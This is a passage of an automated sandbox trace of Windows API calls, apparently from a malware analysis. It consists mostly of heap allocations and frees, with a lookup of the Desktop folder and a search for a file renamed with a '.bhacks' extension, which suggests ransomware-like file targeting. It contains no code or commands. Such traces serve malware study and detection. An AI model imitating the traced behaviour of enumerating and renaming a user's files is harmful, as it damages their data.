hHeap=0x2af0000) returned 1 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0106.895] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0106.895] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6610 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6610 | out: hHeap=0x2af0000) returned 1 [0106.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0106.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0106.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0106.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0106.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0106.897] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0106.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0106.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0106.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0106.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0106.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0106.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0106.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0106.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.902] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WLViPvkU.mp4.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 0x9a3b80 [0106.902] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.902] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 